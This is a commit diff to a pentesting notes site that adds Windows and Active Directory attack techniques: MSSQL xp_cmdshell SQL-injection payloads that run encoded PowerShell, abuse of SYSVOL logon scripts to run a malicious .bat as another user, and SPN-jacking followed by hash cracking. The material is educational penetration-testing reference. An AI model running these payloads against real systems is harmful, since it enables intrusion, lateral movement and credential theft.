updated Windows exploits

Author: hdks-bug

README.md

@@ -26,9 +26,9 @@ This project contains vast information in the cybersecurity field such as below:
 ## :warning: Disclaimer
 
 Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized.This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally.  
-Please use the contents in this site at your own risk.  
+Please use this contents at your own risk.  
 
-The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned.  
+The contents are not original, but based on the information on the internet, the author actually tried and functioned.  
 Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
 
 I'm not a security expert, just an enthusiast, so the contents are not necessarily accurate.

src/disclaimer.vto

@@ -9,10 +9,10 @@ bodyClass: body-disclaimer
         <p class="my-2 text-base">
             Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized.
             This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally.
-            Please use the contents in this site at your own risk.
+            Please use the contents at your own risk.
         </p>
         <p class="my-2 text-base">
-            The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned.
+            The contents are not original, but based on the information on the internet, the author actually tried and functioned.
             Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
         </p>
         <p class="my-2 text-base">

src/exploit/database/mssql-pentesting.md

@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
     - https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
-date: 2024-09-10
+date: 2024-10-13
 draft: false
 ---
 
@@ -159,21 +159,10 @@ If we connected MSSQL using **impacket**, we can exeucte the Windows Shell Comma
 We can execute commands the same as Windows Command Prompt.
 
 ```powershell
-# Get current user
 > xp_cmdshell whoami
 
-# Show files and directories
-> xp_cmdshell dir
-> xp_cmdshell dir \Users
-# Show hidden files
-> xp_cmdshell dir /a
-
-# Get current directory
-> xp_cmdshell cd
-
-# Get contents of file
-> xp_cmdshell more \Users\Administrator\example.txt
-> xp_cmdshell type \Users\Administrator\example.txt
+# Execute obfuscated commands.
+> xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'
 ```
 
 <br />

src/exploit/reverse-engineering/cheatsheet/windbg-cheatsheet.md

@@ -5,7 +5,7 @@ tags:
     - Reverse Engineering
 refs:
     - https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg
-date: 2024-06-27
+date: 2024-10-13
 draft: false
 ---
 
@@ -39,15 +39,12 @@ See command usage by opening the help menu.
 # Force reload
 .reload /f
 
-# List loaded symbols (modules)
-lm
-
 # Examine symbols
-x ExecutableName!*
-# e.g.
-x notepad!*
-x notepad!wWin*
-x SampleApp!main
+x ntdll!NtQueryInformationProcess
+x notepad!*main*
+
+# Resolve symbol name from address
+ln 00007ff6`6c5814c0
 ```
 
 ### Troubleshoot for Loading Symbols
@@ -71,6 +68,19 @@ ba w 4 /w "mymodule!globalVariable == 4" mymodule!globalVariable
 
 <br />
 
+## Modules
+
+```bash
+# List modules
+lm
+# List modules whose module names start with 'a'
+lm m a*
+# Display module information
+lm Dvm <module>
+```
+
+<br />
+
 ## Breakpoints
 
 ```bash
@@ -133,6 +143,15 @@ qd
 
 <br />
 
+## Processes
+
+```sh
+# List all processes
+!process 0 0
+```
+
+<br />
+
 ## Disassembly
 
 Select **View → Disassembly** on the menu.
@@ -195,6 +214,47 @@ dps nt!keservicedescriptortable L4
 
 <br />
 
+## Registers
+
+```bash
+# List all registers
+r
+# In thread 0
+~0 r
+# In all threads
+~* r
+
+# Display a specified register
+r rip
+
+# Display a pseudo-register
+r $peb
+r $teb
+
+# Display xmm0 in unsigned bytes 16
+r xmm0:16ub
+
+# Modify a register value
+r rax=0001
+
+# Copy RBX value to RAX
+r rax = @rbx
+```
+
+<br />
+
+## Search Memory
+
+```bash
+# Search the DWORD 'H' in the range of 1000000 bytes from the RSP address.
+s -d @rsp L1000000 'H'
+
+# Search the string "B7" in the range of 10000000 bytes from the RSP address.
+s -a @rsp L10000000 "B7"
+```
+
+<br />
+
 ## Virtual Memory Protection Information
 
 ```bash
@@ -219,7 +279,6 @@ u $exentry
 # Unassemble backwards
 ub
 ub <address>
-
 ```
 
 <br />

src/exploit/web/jwt-pentesting.md

@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://portswigger.net/web-security/jwt
-date: 2024-09-25
+date: 2024-10-13
 draft: false
 ---
 
@@ -53,6 +53,12 @@ openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
 
 <br />
 
+## Modify `exp` Value
+
+If our JWT token is invalid, we can also try to increase the `exp` (expiration) value.
+
+<br />
+
 ## Automation
 
 **[JWT Toolkit](https://github.com/ticarpi/jwt_tool)** is a toolkit for testing, tweaking and cracking JWT.

src/exploit/web/security-risk/sql-injection-cheat-sheet.md

@@ -10,7 +10,7 @@ refs:
     - https://portswigger.net/web-security/sql-injection/blind
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
     - https://tryhackme.com/room/adventofcyber2023
-date: 2024-05-01
+date: 2024-10-13
 draft: false
 ---
 
@@ -416,10 +416,21 @@ INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (usernam
 
 ## Command Injection
 
+### MySQL
+
 ```text
 ' UNION SELECT NULL,sys_eval('whoami') FROM users-- -
 ```
 
+### MSSQL
+
+```html
+<!-- 1. Enable OS commands. -->
+'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- -
+<!-- 2. Execute command -->
+'; exec master..xp_cmdshell 'powershell -e <BASE64_COMMAND>';-- -
+```
+
 <br />
 
 ## RCE

src/exploit/windows/active-directory/index.md

@@ -7,7 +7,8 @@ tags:
     - Windows
 refs:
     - https://tryhackme.com/room/adenumeration
-date: 2024-03-26
+    - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+date: 2024-10-13
 draft: false
 ---
 
@@ -113,6 +114,25 @@ dir \\dc.example.com\SYSVOL\
 
 <br />
 
+## Abuse Logon Script for Other Users
+
+If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.
+
+```bash
+# 1. Check the permission
+icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
+
+# 2. Modify/Add a malicious script
+'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat
+
+# 3. Set logon script for the specified user
+Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
+```
+
+When the other user logs on, the `.bat` script will be executed.
+
+<br />
+
 ## Force Change Password Attack
 
 If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have **GenericAll** permission to change passwords of other users.

src/exploit/windows/privilege-escalation/index.md

@@ -8,7 +8,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
     - https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-09-14
+date: 2024-10-13
 draft: false
 ---
 
@@ -25,7 +25,9 @@ We might be able to find vulnerabilities on target Windows machine with automati
 ## LOLBAS (Living Off the Land Binaries, Scripts and Libraries)
 
 [LOLBAS](https://lolbas-project.github.io/) provides misuses tools and executables already in the Windows system.
-So check the website.
+So check the website.  
+
+In addition, I've created the [LOLGEN](https://lolgen.hdks.org/) that generates Living Off The Land payload.
 
 <br />
 
@@ -130,8 +132,8 @@ Get-Service | Where-Object {$_.Status -eq "Running"}
 wmic service list
 wmic service list | findstr "Backup"
 
-# Get target process info
-wmic process get processid,parentprocessid,executablepath | find "<process-id>"
+# Enumerate processes in CSV format
+wmic process get caption,executablepath,commandline,processid /format:csv
 # Get users SID
 wmic useraccount get name,sid
 # Launch the hidden executable hiding within ADS

src/exploit/windows/privilege-escalation/spn-jacking.md

@@ -0,0 +1,36 @@
+---
+title: SPN-Jacking
+description: If the current user has a right to write the SPN of another user, we can achieve lateral movement or privilege escalation.
+tags:
+    - Active Directory
+    - Privilege Escalation
+    - Windows
+refs:
+    - https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking
+date: 2024-10-13
+draft: false
+---
+
+## Exploit
+
+### 1. Set SPN and Get the Hash of the Service Ticket
+
+```bash
+# 1. Import PowerView module
+. .\PowerView.ps1
+
+# 2. Set SPN
+Set-DomainObject -Identity <OTHER_USER> -SET @{serviceprincipalname='evil/evil'}
+
+# 3. Request sercice ticket
+Get-DomainSPNTicket -SPN evil/evil
+```
+
+### 2. Crack the Hash
+
+After that, we retrieve the hash of the ticket, so crack it on your local machine:
+
+```bash
+# -m 13100: Replace it with the appropriate number depending on the algorithm.
+hashcat -a 0 -m 13100 hash.txt wordlist.txt
+```